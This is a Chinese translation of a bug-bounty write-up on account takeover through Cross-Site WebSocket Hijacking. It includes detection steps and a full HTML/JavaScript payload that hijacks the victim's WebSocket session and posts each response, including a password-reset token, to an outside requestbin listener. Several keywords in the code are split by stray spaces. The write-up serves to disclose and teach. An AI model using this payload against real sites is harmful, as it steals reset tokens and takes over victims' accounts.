在一次漏洞悬赏活动中，我发现了一个使用WebSocket连接的应用，所以我检查了WebSocket URL，发现它很容易受到CSWH的攻击（WebSocket跨站劫持）

有关CSWH的更多详细信息，可以访问以下链接了解

https://www.christian-schneider.net/CrossSiteWebSocketHijacking.html

首先，我们假设一个应用是通过以下URL建立websocket连接的 wss://website.com。关于验证URL是否存在CSWH漏洞可以遵循以下步骤：

1. 在浏览器上打开Web应用并登录。
2. 在新选项卡中输入http://websocket.org/echo.html，输入WebSocket URL并单击“连接”。
3. 建立连接后，你必须能够从此页面向服务器发送数据帧。接着，使用burpsuite的proxy捕获websocket数据帧进行调试，多次发送，查看服务器如何响应。如果burp的回应和网页的回应一样，则表示目标很可能容易受到WebSocket跨站劫持的攻击

通过以上步骤，我确定应用存在CSWH漏洞。

一旦在新选项卡上建立了WebSocket连接，我就收到了下面的websocket响应

从上述响应中你可看到，参数“_forgotPasswordId”的值为“null”。

现在我需要“_forgotPasswordId”参数来发送恶意请求来重置密码。

我再次测试了Websocket连接，这次观察到了如下回应，它包含一个forgetPasswordID令牌

利用

现在准备CSWH漏洞的利用链，重置密码接管帐户。以下由HTML代码组成的payload会发送XHR请求，并把回应导向攻击者控制的站点。

<!-- Reference http://www.websocket.org/echo.html -->
<!DOCTYPE html>
 <me ta charset="utf-8" />
 <title>Testing</title>
 <sc ript language="ja vasc ript" type="text/ja vasc ript">
 var wsUri = "wss://host.com";
 var output;
 function init()
 {
 output = document.getElementById("output");
 testWebSocket();
 }
 function testWebSocket()
 {
 websocket = new WebSocket(wsUri);
 websocket.onopen = function(evt) { onOpen(evt) };
 websocket.onclose = function(evt) { onClose(evt) };
 websocket.onmessage = function(evt) { onMessage(evt) };
 websocket.on error = function(evt) { on error(evt) };
 }
 function onOpen(evt)
 {
 writeToScreen("CONNECTED");
 doSend('websocket fr ame ');
 }
 function onClose(evt)
 {
 writeToScreen("DISCONNECTED");
 }
 function onMessage(evt)
 {
var xhr = new xm lHttpRequest();
xhr.open("POST", "http://requestbin.fullcontact.com/1143n2w1", true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.send(evt.data);
 websocket.close();
 }
 function on error(evt)
 {
 writeToScreen('<span style="color: red;">ERROR:</span> ' + evt.data);
 }
 function doSend(message)
 {
 writeToScreen("SENT: " + message);
 websocket.send(message);
 }
 function writeToScreen(message)
 {
 var pre = document.createElement("p");
 pre.style.wordWrap = "break-word";
 pre.innerHTML = message;
 output.appendChild(pre);
 }
 window.addEventListener("load", init, false);
 </sc ript>
 <h2>WebSocket Test</h2>
 <di v id="output"></di v>

攻击步骤

1. 利用“忘记密码”页面，发送受害者帐户的密码重置请求
2. 托管以上html到公网网站上，并向受害者发送这个URL（类似于CSRF攻击）
3. 一旦受害者点击URL，就可以在监听器上得到websocket响应，如下图所示

拥有这个“forgotPasswordID”令牌，我们就可以重置受害者密码。

本文由白帽汇整理并翻译，不代表白帽汇任何观点和立场

来源：https://nosec.org/home/detail/2335.html

原文：https://medium.com/@sharan.panegav/account-takeover-using-cross-site-websocket-hijacking-cswh-99cf9cea6c50

白帽汇从事信息安全，专注于安全大数据、企业威胁情报。

公司产品：FOFA-网络空间安全搜索引擎、FOEYE-网络空间检索系统、NOSEC-安全讯息平台。

为您提供：网络空间测绘、企业资产收集、企业威胁情报、应急响应服务。